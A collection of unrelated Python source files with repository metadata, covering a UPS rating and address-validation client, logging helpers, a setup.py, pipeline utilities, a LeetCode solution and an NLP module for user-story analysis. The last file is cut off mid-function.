Python
| false
| false
| 305
|
py
|
import numpy as np
import pandas as pd
i=1
arch=pd.read_csv('./Supuestosgenerales/Generales/Categorias/categorias.csv')
for i in range (1,6):
arch[f"Año {i}"]=""
arch.loc[0,f'Año {i}']='0'
arch.to_csv("./Supuestosgenerales/Generales/Categorias/categorias2.csv", index=False)
print(arch)
|
[
"albertonavarreteramirez@gmail.com"
] |
albertonavarreteramirez@gmail.com
|
202b635cea301604ed59c0033bda3fbb572bbf3f
|
9407c2981b6fe999891af411678cf69a29f1be2d
|
/ups/__init__.py
|
dcdfa402dd8381ee01ec46e3d84469ad91c76c68
|
[] |
no_license
|
tedshroyer/python-ship
|
91f8a0e60d16ac5d08761e943ce043cf3e8d9d83
|
966dc4a4e85fd2771a664d0d065f62b53cc56f5c
|
refs/heads/master
| 2021-01-17T22:02:28.904997
| 2011-12-21T21:30:04
| 2011-12-21T21:30:04
| 2,279,935
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,397
|
py
|
import logging
logger = logging.getLogger(__name__)
import datetime
import StringIO
import binascii
import urllib2
SERVICES = [
('03', 'UPS Ground'),
('11', 'UPS Standard'),
('01', 'UPS Next Day'),
('14', 'UPS Next Day AM'),
('13', 'UPS Next Day Air Saver'),
('02', 'UPS 2nd Day'),
('59', 'UPS 2nd Day AM'),
('12', 'UPS 3-day Select'),
('65', 'UPS Saver'),
('07', 'UPS Worldwide Express'),
('08', 'UPS Worldwide Expedited'),
('54', 'UPS Worldwide Express Plus'),
]
SERVICES_LOOKUP = dict(SERVICES)
PACKAGES = [
('02', 'Custom Packaging'),
('01', 'UPS Letter'),
('03', 'Tube'),
('04', 'PAK'),
('21', 'UPS Express Box'),
('2a', 'Small Express Box'),
('2b', 'Medium Express Box'),
('2c', 'Large Express Box'),
]
import accessrequest as access_xml
import raterequest as rate_xml
import rateresponse as rate_response_xml
import xavrequest as avs_xml
import xavresponse as avs_response_xml
from pyship import shipping
class UPS(object):
def __init__(self, credentials_dictionary={}, debug=True, username='', password='', account='', license=''):
self.access = access_xml.AccessRequest()
self.access.AccessLicenseNumber = credentials_dictionary.get('access_license', license)
self.access.UserId = credentials_dictionary.get('username', username)
self.access.Password = credentials_dictionary.get('password', password)
self.account = credentials_dictionary.get('shipper_number', account)
self.debug = debug
self.request = None
self.namespacedef = ''
if self.debug:
self.post_url = 'https://wwwcie.ups.com/ups.app/xml/'
else:
self.post_url = 'https://onlinetools.ups.com/ups.app/xml/'
self.post_url_suffix = ''
def make_shipper(self, namespace, from_address, ups_account):
shipper = namespace.ShipperType()
shipper.Name = from_address.company[:35]
if len(shipper.Name) == 0:
shipper.Name = from_address.name[:35]
if ups_account and len(ups_account) > 0:
shipper.ShipperNumber = ups_account
else:
# Fall back to the account from configuration
shipper.ShipperNumber = self.account
shipper.Address = namespace.AddressType()
shipper.Address.AddressLine1 = from_address.address1
shipper.Address.AddressLine2 = getattr(from_address, 'address2', '')
shipper.Address.AddressLine3 = getattr(from_address, 'address3', '')
shipper.Address.City = from_address.city
if from_address.country in ('US', 'CA', 'IE'):
shipper.Address.StateProvinceCode = from_address.state
shipper.Address.PostalCode = from_address.zip
shipper.Address.CountryCode = from_address.country
if from_address.is_residence:
shipper.Address.ResidentialAddressIndicator = ''
return shipper
def make_ship_to(self, namespace, to_address):
ship_to = namespace.ShipToType()
ship_to.Name = to_address.company[:35]
if len(ship_to.Name) == 0:
ship_to.Name = to_address.name[:35]
ship_to.Address = namespace.AddressType()
ship_to.Address.AddressLine1 = to_address.address1
ship_to.Address.AddressLine2 = getattr(to_address, 'address2', '')
ship_to.Address.AddressLine3 = getattr(to_address, 'address3', '')
ship_to.Address.City = to_address.city
if to_address.country in ('US', 'CA', 'IE'):
ship_to.Address.StateProvinceCode = to_address.state
ship_to.Address.PostalCode = to_address.zip
ship_to.Address.CountryCode = to_address.country
if to_address.is_residence:
ship_to.Address.ResidentialAddressIndicator = ''
return ship_to
def verify(self, address, transaction_id = None):
self.post_url_suffix = 'XAV'
self.request = avs_xml.AddressValidationRequest()
self.request.Request = avs_xml.RequestType()
self.request.Request.TransactionReference = avs_xml.TransactionReferenceType()
if transaction_id != None:
self.request.Request.TransactionReference.CustomerContext = str(transaction_id)
else:
self.request.Request.TransactionReference.CustomerContext = datetime.datetime.now().strftime('xav.%Y%m%d.%H%M%S')
self.request.Request.RequestAction = 'XAV'
self.request.Request.RequestOption = 3 # Address Validation w/ Classification (not documented in xml spec)
# Do not set the regional request indicator if using address classification
#self.request.RegionalRequestIndicator = ''
# Maximum Result Candidates default is 15
self.request.MaximumListSize = 5
self.request.AddressKeyFormat = []
address_info = avs_xml.AddressKeyFormatType()
address_info.ConsigneeName = address.name
address_info.AddressLine = [ address.address1, address.address2 ]
address_info.PoliticalDivision2 = address.city
address_info.PoliticalDivision1 = address.state
address_info.PostcodePrimaryLow = address.zip
address_info.CountryCode = address.country
self.request.AddressKeyFormat.append(address_info)
response = self.send()
response_xml = avs_response_xml.parseString(response)
parsed_response = {
'status' : response_xml.Response.ResponseStatusDescription,
'transaction_id' : response_xml.Response.TransactionReference.CustomerContext,
'candidates' : []}
if response_xml.AddressClassification:
parsed_response['class_code'] = response_xml.AddressClassification.Code
parsed_response['class_description'] = response_xml.AddressClassification.Description
parsed_response['valid'] = response_xml.ValidAddressIndicator == True
parsed_response['ambiguous'] = response_xml.AmbiguousAddressIndicator == True
parsed_response['no_candidates'] = response_xml.NoCandidatesIndicator == True
if not parsed_response['no_candidates']:
for candidate in response_xml.AddressKeyFormat:
name = candidate.ConsigneeName
if name == None:
name = ''
a = shipping.Address(
name,
candidate.AddressLine[0],
candidate.PoliticalDivision2,
candidate.PoliticalDivision1,
candidate.PostcodePrimaryLow,
candidate.CountryCode)
if len(candidate.AddressLine) > 1:
a.address2 = candidate.AddressLine[1]
if a not in parsed_response['candidates']:
parsed_response['candidates'].append(a)
return parsed_response
validate = verify
def rate(self, packages, packaging_type, from_address, to_address, ups_account=None, rate_type='00', service_type=None, transaction_id=None):
self.post_url_suffix = 'Rate'
self.request = rate_xml.RatingServiceSelectionRequest()
self.request.Request = rate_xml.RequestType()
self.request.Request.TransactionReference = rate_xml.TransactionReferenceType()
if transaction_id != None:
self.request.Request.TransactionReference.CustomerContext = str(transaction_id)
else:
self.request.Request.TransactionReference.CustomerContext = datetime.datetime.now().strftime('rate.%Y%m%d.%H%M%S')
self.request.Request.RequestAction = 'Rate'
self.request.Request.RequestOption = 'Shop'
self.request.PickupType = rate_xml.CodeType()
self.request.PickupType.Code = '01' # Using Daily Pickup
self.request.CustomerClassification = rate_xml.CodeType()
self.request.CustomerClassification.Code = rate_type
self.request.Shipment = rate_xml.ShipmentType()
self.request.Shipment.RateInformation = rate_xml.RateInformationType()
self.request.Shipment.RateInformation.NegotiatedRatesIndicator = ''
if service_type:
# Set the service type if needed
self.request.Shipment.Service = rate_xml.CodeDescriptionType()
self.request.Shipment.Service.Code = service_type
self.request.Shipment.Shipper = self.make_shipper(rate_xml, from_address, ups_account)
self.request.Shipment.ShipTo = self.make_ship_to(rate_xml, to_address)
self.request.Shipment.Package = []
for p in packages:
package = rate_xml.PackageType()
package.PackagingType = rate_xml.PackagingTypeType()
package.PackagingType.Code = packaging_type
package.Dimensions = rate_xml.DimensionsType()
package.Dimensions.UnitOfMeasurement = rate_xml.UnitOfMeasurementType()
package.Dimensions.UnitOfMeasurement.Code = 'IN' #Other choice is CM
package.Dimensions.Length = p.length
package.Dimensions.Width = p.width
package.Dimensions.Height = p.height
package.PackageWeight = rate_xml.WeightType()
package.PackageWeight.UnitOfMeasurement = rate_xml.UnitOfMeasurementType()
package.PackageWeight.UnitOfMeasurement.Code = 'LBS' #Other choice is KGS
package.PackageWeight.Weight = p.weight
# Always declare a value for insurance when rating
package.PackageServiceOptions = rate_xml.PackageServiceOptionsType()
package.PackageServiceOptions.InsuredValue = rate_xml.InsuredValueType()
package.PackageServiceOptions.InsuredValue.MonetaryValue = p.value or 100
package.PackageServiceOptions.InsuredValue.CurrencyCode = 'USD'
if p.require_signature:
package.PackageServiceOptions.DeliveryConfirmation = rate_xml.DeliveryConfirmationType()
# Valid values are:
# 1 - Delivery Confirmation;
# 2 - Delivery Confirmation Signature Required;
# 3 - Delivery Confirmation Adult Signature Required
if type(p.require_signature) == int and p.require_signature in (1, 2, 3):
package.PackageServiceOptions.DeliveryConfirmation.DCISType = p.require_signature
else:
# Pick 1 for signature required, 2 for adult signature.
package.PackageServiceOptions.DeliveryConfirmation.DCISType = 1
self.request.Shipment.Package.append(package)
response = self.send()
response_xml = rate_response_xml.parseString(response)
info = []
for r in response_xml.RatedShipment:
try:
cost = r.NegotiatedRateCharges.TotalCharge.MonetaryValue
except AttributeError:
cost = r.TotalCharges.MonetaryValue
info.append({
'service': SERVICES_LOOKUP.get(r.Service.Code, 'Unknown Service: {}'.format(r.Service.Code)),
'package': '',
'delivery_day': '',
'cost': cost
})
parsed_response = {
'status' : response_xml.Response.ResponseStatusDescription,
'transaction_id' : response_xml.Response.TransactionReference.CustomerContext,
'info' : info}
return parsed_response
def label(self, packages, packaging_type, service_type, from_address, to_address, email_alert=None, evening=False, payment=None, delivery_instructions=''):
pass
def send(self):
data = StringIO.StringIO()
data.write('<?xml version="1.0" ?>\n')
self.access.export(data, 0, namespacedef_=self.namespacedef)
data.write('<?xml version="1.0" ?>\n')
self.request.export(data, 0, namespacedef_=self.namespacedef)
data = data.getvalue()
data = data.encode('ascii')
logger.debug('XML Request:\n%s' % data)
request = urllib2.Request(self.post_url + self.post_url_suffix)
request.add_data(data)
request.add_header('Accept', 'image/gif, image/jpeg, image/pjpeg, text/plain, text/html, */*')
request.add_header('Content-Type', 'text/xml')
request.add_header('Content-length', str(len(data)))
# Get the response
response = urllib2.urlopen(request)
if response.code != 200:
logger.error('HTTP Error %s' % str(response.code))
raise Exception('HTTP Error %s' % str(response.code))
response_data = response.read()
logger.debug('XML Response:\n%s' % response_data)
return response_data
Ups = UPS
|
[
"tedshroyer@gmail.com"
] |
tedshroyer@gmail.com
|
6bdbf8c569a7e5e03f81924aa3e808424180af0e
|
8354d7f388d1ceb4c270b1b3023ab0bd3fbb91f2
|
/recordLoggerId.py
|
9798ebffefb5a8442e8c6f87ad7f377786878633
|
[] |
no_license
|
vathymut/pynha
|
bc901ed4c3da65e033695232fe9afe2f3f7e7ba4
|
37041a0aa4b1e2401b730c82f0d85e30ad7ef8d6
|
refs/heads/master
| 2020-05-25T09:50:11.880983
| 2015-01-20T19:46:39
| 2015-01-20T19:46:39
| 28,049,487
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,633
|
py
|
# -*- coding: utf-8 -*-
"""
@author: Vathy M. Kamulete
"""
from __future__ import division
from ioFunc import gen_issuer_names, create_issuer_dir, safe_delete, create_dir
from contextlib import contextmanager
from os import walk, remove, getcwd, chdir
from os.path import dirname, abspath, join, exists
import csv
# Declare functions to import
__all__ = [ 'write_successes_to_csv', 'write_summ_loggers_to_csv', \
'log_exceptions', 'delete_log_files', 'create_log_folders', \
'delete_csv_from_loggers', 'get_stats_from_loggers' ]
def write_successes_to_log( dir_to_log, content, logging_dir = 'logging_rates' ):
"""
Write successes to log 'success.txt'.
dir_to_log is the issuer for which the information belongs.
content is the info to write to csv.
"""
filename = join( HOMEDIR, logging_dir, dir_to_log, 'success.txt' )
with open( filename, 'a+' ) as f:
f.write( content + '\n' )
def write_failures_to_log( dir_to_log, content, logging_dir = 'logging_rates' ):
"""
Write failures to log 'failure.txt'.
dir_to_log is the issuer for which the information belongs.
content is the info to write to csv.
"""
filename_fullpath = join( HOMEDIR, logging_dir, dir_to_log, 'failure.txt' )
with open( filename_fullpath, 'a+' ) as f:
f.write( content + '\n' )
def write_successes_to_csv( dir_to_log, content, result_type = 'rates' ):
"""
Write successes to csv.
result_type is the type of the info: rates, dates, no. of mortgages, etc
dir_to_log is the issuer for which the information belongs.
content is the info to write to csv.
"""
filename = result_type + '.csv'
filename_fullpath = join( HOMEDIR, result_type, dir_to_log, filename )
file_exists = exists( filename_fullpath )
with open( filename_fullpath, 'ab+' ) as f:
f_csv = csv.writer( f )
if not file_exists:
# Write the column headers.
# content must be a namedtuple with attributes _fields.
f_csv.writerow( content._fields )
f_csv.writerow( content )
def write_summary_logs( summ_list, filepath ):
"""
Write summary logs to csv file.
"""
COL_FIELDS = [ 'issuer', 'no_failed', 'no_succeeded', 'success_rate' ]
create_dir( dirname( filepath ) )
with open( filepath, 'wb' ) as f:
f_csv = csv.writer( f )
f_csv.writerow( COL_FIELDS )
for row in summ_list:
f_csv.writerow( row )
def write_summ_loggers_to_csv( summ_list, result_type = 'rates', summ_dir = 'summ_loggers' ):
"""
Write summary logs summ_list to csv file
result_type in the folder summ_dir.
"""
no_issuers = len( summ_list )
overwrite_log = no_issuers == len( list( gen_issuer_names() ) )
if not overwrite_log:
print 'Processed %s issuer(s) -- Not overwriting log folder' % ( no_issuers )
return
filename = 'summ_' + result_type + '.csv'
filename_fullpath = join( HOMEDIR, summ_dir, filename )
print 'Overwriting log folder'
write_summary_logs( summ_list = summ_list, filepath = filename_fullpath )
@contextmanager
def log_exceptions( dir_to_log, content, logging_dir, test_run = True ):
"""
Log exceptions when trying to extract .csv info.
"""
try:
yield
if not test_run: # Log success
write_successes_to_log( dir_to_log, content, logging_dir = logging_dir )
except ( ValueError, TypeError ) as err:
print '\t%s: %s\n' % ( type(err), err.message )
write_failures_to_log( dir_to_log, content, logging_dir = logging_dir )
def delete_log_files( pattern_str, default_start_walk = 'logging_rates' ):
"""
Delete files if the pattern pattern_str matches the filename.
"""
args = default_start_walk.split()
start_dir = join( HOMEDIR, *args )
for dirpath, _, filenames in walk( start_dir ):
for f in filenames:
filepath = join( dirpath, f)
if pattern_str in filepath:
print 'Logger deleted: %s' % ( filepath )
remove( filepath )
def create_log_folders( results_folder = 'rates' , \
logging_dir = None, \
debug_print = False ):
"""
Create folders to log files that failed to parse.
"""
if logging_dir is None:
logging_dir = 'logging_' + results_folder
for issuer in gen_issuer_names( ):
create_issuer_dir( issuer, prefix_path = logging_dir, debug_print = debug_print )
create_issuer_dir( issuer, prefix_path = results_folder, debug_print = debug_print )
def gen_loggers_path( keep_list = None, logging_folder = 'logging_rates' ):
"""
Generate path to the logging directories in logging_folder.
Get all issuers' path if keep_list is None.
Otherwise get only issuers' path in keep_list.
"""
for issuer in gen_issuer_names():
if keep_list and issuer not in keep_list:
continue
logpath = join( HOMEDIR, logging_folder, issuer )
yield logpath, issuer
def gen_csvfailed_path( ):
"""
Generate filepaths to csv files in failure.txt
that failed to parse.
"""
csvpaths = open( 'failure.txt' , 'r' ).readlines()
csvpaths = [ f.replace( '\n', '' ) for f in csvpaths ]
for csvpath in csvpaths:
yield csvpath
def delete_csv_from_loggers( issuers_list, logging_folder = 'logging_rates' ):
"""
Delete csv files in folder csv_raw for issuer in issuers_list
if the file is in the failure log.
"""
CURRDIR = getcwd( )
try:
for logpath, issuer in gen_loggers_path( issuers_list, logging_folder ):
chdir( logpath )
if not exists( 'failure.txt' ):
continue
for csvpath in gen_csvfailed_path( ):
# CSVDIR is a global variable (set elsewhere)
# CSVDIR is either: /pynha_csv/csv_raw or /pynha_csv/csv_firstpage
csv_fullpath = join( CSVDIR, issuer, csvpath )
safe_delete( csv_fullpath )
finally:
chdir( CURRDIR )
print 'Done'
def count_lines( fname ):
"""
Get a line count. If file doesn't exist, return 0.
Adapted from StackOverflow:
http://stackoverflow.com/q/845058/1965432
"""
if not exists( fname ):
return 0
with open( fname ) as f:
for i, l in enumerate( f ):
pass
return i + 1
def summ_issuer_logs():
"""
Return summary stats for issuer about the number of files
in failure.txt and success.txt. Function assumes that
current directory is the logging directory.
"""
success_count = count_lines( 'success.txt' )
failure_count = count_lines( 'failure.txt' )
try:
success_rate = success_count/( success_count + failure_count )
except ( ZeroDivisionError, ) as err:
success_rate = 'TODO'
return failure_count, success_count, success_rate
def get_stats_from_loggers( issuers_list, logging_folder = 'logging_rates' ):
"""
Call summ_issuer_logs for each issuer in issuers_list
and returns stats from the logging_folder.
"""
results_list = list( )
for logpath, issuer in gen_loggers_path( issuers_list, logging_folder ):
chdir( logpath )
failure_count, success_count, success_rate = summ_issuer_logs( )
issuer_infolist = [ issuer, failure_count, success_count, success_rate ]
results_list.append( issuer_infolist )
return results_list
if __name__ == '__main__' :
# Include tests here if needed
print 'Leave blank for now'
|
[
"vathymut@gmail.com"
] |
vathymut@gmail.com
|
61b29b234ac538819a506f9b35ad04235d880747
|
6e1f550b71e212cec90f070e2e9a1dd714de55d6
|
/setup.py
|
1586e43ed05c743040c5c403f039e0139055220a
|
[
"MIT"
] |
permissive
|
wbond/gears-libsass
|
b4f7986ffa642b79a5b1ab3125c9d9056d6777fc
|
a861089306572b5250c3d3716abd916dc140fa20
|
refs/heads/master
| 2020-04-10T06:21:20.079859
| 2018-12-07T17:09:42
| 2018-12-07T17:09:42
| 160,851,933
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,004
|
py
|
import os
from setuptools import setup, find_packages
def read(filename):
return open(os.path.join(os.path.dirname(__file__), filename)).read()
setup(
name='gears-libsass',
version='0.1.0',
url='https://github.com/wbond/gears-libsass',
license='MIT',
author='Will Bond',
author_email='will@wbond.net',
description='Python libsass-based SCSS compiler for Gears',
long_description=read('README.rst'),
packages=find_packages(),
include_package_data=True,
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
],
install_requires=[
"libsass >= 0.16.1"
],
)
|
[
"will@wbond.net"
] |
will@wbond.net
|
9cf95ea8c8587547eda0ba121e569f8022e1aa55
|
19172e15355d4ef8ae4622d0ed6993c0cd4d80ea
|
/watchmen/pipeline/single/stage/unit/utils/units_func.py
|
1092797ba1dbe85e75457093d67cdc1b76bc612d
|
[
"MIT"
] |
permissive
|
TSRAW/watchmen-matryoshka-doll
|
d5b50fc4014fbea11c2765f377ca904d17a4c579
|
ab17e36a0f26f8e461296a222e6f7f2a4532c877
|
refs/heads/master
| 2023-03-18T05:40:08.354019
| 2021-03-17T15:52:34
| 2021-03-17T15:52:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,313
|
py
|
from datetime import datetime
from watchmen.common.constants import parameter_constants, pipeline_constants
from watchmen.topic.factor.factor import Factor
from watchmen.topic.topic import Topic
INSERT = "insert"
UPDATE = "update"
SEQUENCE = "sequence"
NUMBER = "number"
UNSIGNED = "unsigned" # 0 & positive
TEXT = "text"
TIME = 'time'
# address
ADDRESS = "address"
CONTINENT = "continent"
REGION = "region"
COUNTRY = "country"
PROVINCE = "province"
CITY = "city"
DISTRICT = "district"
ROAD = "road"
COMMUNITY = "community"
FLOOR = "floor"
RESIDENCE_TYPE = "residence-type"
RESIDENTIAL_AREA = "residential-area"
EMAIL = "email"
PHONE = "phone"
MOBILE = "mobile"
FAX = "fax"
DATETIME = "datetime" # YYYY - MM - DD
DATE = "date" # YYYY - MM - DD
TIME = "time" # HH: mm:ss
YEAR = "year" # 4
HALF_YEAR = "half-year" # 1: first
QUARTER = "quarter" # 1 - 4
SEASON = "season" # 1: spring, 2: summer, 3: autumn, 4: winter
MONTH = "month" # 1 - 12
HALF_MONTH = "half-month" # 1: first
TEN_DAYS = "ten-days" # 1, 2, 3
WEEK_OF_YEAR = "week-of-year" # 1 - 53
WEEK_OF_MONTH = "week-of-month" # 1 - 6
HALF_WEEK = "half-week" # 1: first
DAY_OF_MONTH = "day-of-month" # 1 - 31, according
DAY_OF_WEEK = "day-of-week" # 1 - 7
DAY_KIND = "day-kind" # 1: workday, 2: weekend, 3: holiday
HOUR = "hour" # 0 - 23
HOUR_KIND = "hour-kind" # 1: work
MINUTE = "minute" # 0 - 59
SECOND = "second" # 0 - 59
AM_PM = "am-pm" # 1, 2
# individual
GENDER = "gender"
OCCUPATION = "occupation"
DATE_OF_BIRTH = "date-of-birth" # YYYY - MM - DD
AGE = "age"
ID_NO = "id-no"
RELIGION = "religion"
NATIONALITY = "nationality"
# organization
BIZ_TRADE = "biz-trade"
BIZ_SCALE = "biz-scale"
BOOLEAN = "boolean"
ENUM = "enum"
OBJECT = "object"
ARRAY = "array"
def check_condition(operator, left_value, right_value):
if operator == "equals":
return left_value == right_value
elif operator == "not-equals":
return left_value != right_value
elif operator == "less":
return left_value < right_value
elif operator == "less-equals":
return left_value <= right_value
elif operator == "more":
return left_value > right_value
elif operator == "more-equals":
return left_value >= right_value
else:
raise Exception("NotImplemented:", operator)
def convert_factor_type(value, factor_type):
if factor_type == TEXT:
return str(value)
elif factor_type == NUMBER:
# TODO process number type
return float(value)
elif factor_type == DATETIME:
return datetime.fromisoformat(value)
elif factor_type == BOOLEAN:
return bool(value)
elif factor_type == SEQUENCE:
return int(value)
elif factor_type == YEAR:
return int(value)
elif factor_type == MONTH:
return int(value)
elif factor_type == TIME:
return round(value * 1000)
else:
return value
def build_factor_dict(topic: Topic):
factor_dict = {}
for factor in topic.factors:
factor_dict[factor.factorId] = factor
return factor_dict
def get_factor(factor_id, target_topic):
for factor in target_topic.factors:
if factor.factorId == factor_id:
return factor
def get_execute_time(start_time):
time_elapsed = datetime.now() - start_time
execution_time = time_elapsed.microseconds / 1000
return execution_time
def get_value(factor: Factor, data):
if factor.name in data:
value = data[factor.name]
return convert_factor_type(value, factor.type)
elif factor.type == "number":
return None
elif factor.type == "text":
return None
else:
return None
def add_audit_columns(dictionary, audit_type):
if audit_type == INSERT:
dictionary[pipeline_constants.INSERT_TIME] = datetime.now()
elif audit_type == UPDATE:
dictionary[pipeline_constants.UPDATE_TIME] = datetime.now()
else:
raise Exception("unknown audit_type")
def add_trace_columns(dictionary, trace_type, pipeline_uid):
dictionary[trace_type] = pipeline_uid
def process_variable(variable_name):
if variable_name.startswith("{"):
return "memory", variable_name.replace("{", "").replace("}", "")
else:
return parameter_constants.CONSTANT, variable_name
|
[
"luke0623@outlook.com"
] |
luke0623@outlook.com
|
97d31bc99318da98c36566bc2f7a502e1953d6d9
|
54e4c1a57765519c77d04fc02112c7f3bbacc595
|
/prob_1317.py
|
11e01b22fc965fafc4a81f4f1b4e4ef0ee88e358
|
[] |
no_license
|
Hrishikesh-3459/leetCode
|
80a864228a8a2ae41ac2623f970a13f409234eed
|
42def57b8f70d179ca688314ae43747fc1e410a0
|
refs/heads/master
| 2023-05-07T01:37:19.375229
| 2021-05-25T01:58:05
| 2021-05-25T01:58:05
| 254,803,743
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 744
|
py
|
class Solution:
def sortString(self, s: str) -> str:
x = list(s)
ans = []
ans_2 = []
fin = []
count = 0
while True:
for i in sorted(x):
if (i not in ans):
ans.append(i)
count +=1
x.pop(x.index(i))
for j in sorted(x)[::-1]:
if (j not in ans_2):
count +=1
ans_2.append(j)
x.pop(x.index(j))
fin += ans + ans_2
if (count == len(s)):
break
ans.clear()
ans_2.clear()
ans_str = ""
for j in fin:
ans_str += j
return ans_str
|
[
"noreply@github.com"
] |
noreply@github.com
|
fc49527e3308118e7a6f32d4d744ba81f26db2a1
|
a7a5f39c2e95ac1317c6cd786517e028991c779a
|
/Analysis/use_cases.py
|
4a67fd300ba050e038fc21fb12c1fcdc508eeaf5
|
[] |
no_license
|
wojtunikd/requml-py
|
3a8eb259b70b9e604a0cdd150b47c81dd54e77d2
|
11c67050eae5447d484e75eae600173dd1cae446
|
refs/heads/main
| 2023-07-16T18:22:13.806273
| 2021-08-29T15:52:07
| 2021-08-29T15:52:07
| 380,573,135
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,980
|
py
|
from Analysis.preprocessing import removePunctuation, getDomainSpecificWords, getPOSExclusion, getDependencyPhrases, recogniseAndRemoveBenefit
from nltk import WordNetLemmatizer, word_tokenize, pos_tag
from nltk.corpus import wordnet
from nltk.corpus.reader.wordnet import WordNetError
import spacy
import copy
nlp = spacy.load("en_core_web_sm")
lemmatizer = WordNetLemmatizer()
def verifyPhraseDomainWords(phrase):
words = phrase.split()
exclusion = getDomainSpecificWords()
return any(element in words for element in exclusion)
def conductUseCasesAnalysis(order):
cleanedActors = cleanActors(order["userStories"])
cleanedStories = findSynonymsAndTransferStories(cleanedActors)
actorUseCases = getUseCasesFromStories(cleanedStories)
return refineActorUseCases(actorUseCases)
def cleanActors(stories):
cleaned = list()
for story in stories:
actor = nlp(story["role"].lower())
actorName = list()
# In case no obvious nouns are recognised or if some nouns are misclassified (e.g. a cook/to cook)
if len([noun for noun in actor.noun_chunks]) == 0:
actorName.append(story["role"].lower())
else:
for chunk in actor.noun_chunks:
actorName.append(chunk.lemma_ if not verifyPhraseDomainWords(chunk.text) else chunk.text)
cleaned.append({"id": story["_id"], "actor": " ".join(actorName), "action": story["action"]})
return cleaned
def removeDuplicates(values):
return list(dict.fromkeys(values))
def getAllActors(stories):
actors = list()
for story in stories:
actors.append(story["actor"])
return removeDuplicates(actors)
def getAllStoriesOfActor(stories, actor):
return [item for item in stories if item.get("actor") == actor]
# This function looks for synonyms among the names of actors. If a synonym is detected, one name for both
# actors is selected and the standardised name replaces the synonym in all user stories.
def findSynonymsAndTransferStories(stories):
def finaliseActorStories(allStories, cleanedActor, currentIDs):
processedStories = list()
processedIDs = list()
storiesRetrieved = getAllStoriesOfActor(allStories, cleanedActor)
for storyToProcess in storiesRetrieved:
if not storyToProcess["id"] in currentIDs:
processedStories.append({"actor": cleanedActor.capitalize(), "action": storyToProcess["action"]})
processedIDs.append(storyToProcess["id"])
return {"processedStories": processedStories, "processedIDs": processedIDs}
cleanedStories = list()
ids = list()
actors = getAllActors(stories)
for index, actor in enumerate(actors):
actorsToReplace = [actor]
actorSynonyms = []
try:
actorSynonyms = wordnet.synset(str(actor) + ".n.01")
except WordNetError:
pass
# Check if the object has an attribute lemmas. In case synset failed to identify the word
# (e.g. when it's a compound noun or a neologism), the object won't have any lemmas and
# the stories for that actor will be processed and finalised without further steps.
if not hasattr(actorSynonyms, "lemmas"):
finalisedStories = finaliseActorStories(stories, actor, ids)
cleanedStories.extend(finalisedStories["processedStories"])
ids.extend(finalisedStories["processedIDs"])
continue
# Processes and finalises stories for the actor word, if the word has no known synonyms found by synset
if len(actorSynonyms.lemmas()) == 1:
finalisedStories = finaliseActorStories(stories, actor, ids)
cleanedStories.extend(finalisedStories["processedStories"])
ids.extend(finalisedStories["processedIDs"])
continue
# If synset identified synonyms for the actor word, all other actor words are checked to verify whether
# some actor words are synonymic. In such a case, the similarity score between them will be 1.0.
for nextActor in actors[index+1:]:
nextActorSynonyms = []
try:
nextActorSynonyms = wordnet.synset(str(nextActor) + ".n.01")
except WordNetError:
pass
if not hasattr(nextActorSynonyms, "lemmas"):
finalisedStories = finaliseActorStories(stories, actor, ids)
cleanedStories.extend(finalisedStories["processedStories"])
ids.extend(finalisedStories["processedIDs"])
continue
if len(nextActorSynonyms.lemmas()) == 1:
finalisedStories = finaliseActorStories(stories, actor, ids)
cleanedStories.extend(finalisedStories["processedStories"])
ids.extend(finalisedStories["processedIDs"])
continue
# If the next actor word is valid as per synset and has synonyms, the similarity between
# the next actor word and the one currently in question is assessed.
similarityScore = actorSynonyms.wup_similarity(nextActorSynonyms)
# If the actor words are synonyms, replace the next actor word with the current one in all stories
if similarityScore == 1.0:
actorsToReplace.append(nextActor)
# After all the following actor words are checked against the current actor word, the synonymic actors
# will be replaced with the current actor words for every user story
for actorToReplace in actorsToReplace:
allActorStories = getAllStoriesOfActor(stories, actorToReplace)
for storyToAppend in allActorStories:
if not storyToAppend["id"] in ids:
cleanedStories.append({"actor": actor.capitalize(), "action": storyToAppend["action"]})
ids.append(storyToAppend["id"])
return cleanedStories
def getUseCasesFromStories(stories):
actorsWithUseCases = list()
storiesOnly = list()
# The list of parts of speech that will be omitted from the action sentence
exclusionRule = getPOSExclusion()
for index, story in enumerate(stories):
# Pre-processing, remove any unnecessary punctuation
storyAction = removePunctuation(story["action"])
# Pre-processing, remove benefit from sentence
storyNoBenefit = recogniseAndRemoveBenefit(nlp, storyAction)
# Pre-processing, tokenizing words in a sentence
tokens = word_tokenize(storyNoBenefit)
# Part-of-speech tagging of each word in a sentence
taggedWords = pos_tag(tokens)
for i, word in enumerate(taggedWords):
# Excluding words that are of a speech part included in the exclusion rule
if word[1] in exclusionRule and word[0] != "not" and i != 0:
taggedWords.pop(i)
firstAction = list()
for i, word in enumerate(taggedWords):
firstAction.append(word[0])
firstAction[0] = firstAction[0].capitalize()
actorInList = False
finalStory = " ".join(firstAction)
storiesOnly.append(finalStory)
for sublist in actorsWithUseCases:
if sublist["actor"] == story["actor"]:
sublist["useCases"] = [*sublist["useCases"], {"useCase": finalStory, "core": list()}]
actorInList = True
if not actorInList:
actorsWithUseCases.append({"actor": story["actor"], "useCases": [{"useCase": finalStory, "core": list()}]})
return {"actorsWithUseCases": actorsWithUseCases}
def refineActorUseCases(actorsWithUseCases):
refinedActorUseCases = copy.deepcopy(actorsWithUseCases)["actorsWithUseCases"]
dependency = getDependencyPhrases()
for actorIdx, actor in enumerate(refinedActorUseCases):
for storyIdx, story in enumerate(actor["useCases"]):
useCasesDoc = nlp(story["useCase"])
for tokenIdx, token in enumerate(useCasesDoc):
if token.dep_ == dependency["ROOT"] or tokenIdx == 0:
refinedActorUseCases[actorIdx]["useCases"][storyIdx]["core"].append(tokenIdx)
elif token.dep_ == dependency["CONJUGATION"] and token.head.dep_ == dependency["ROOT"]:
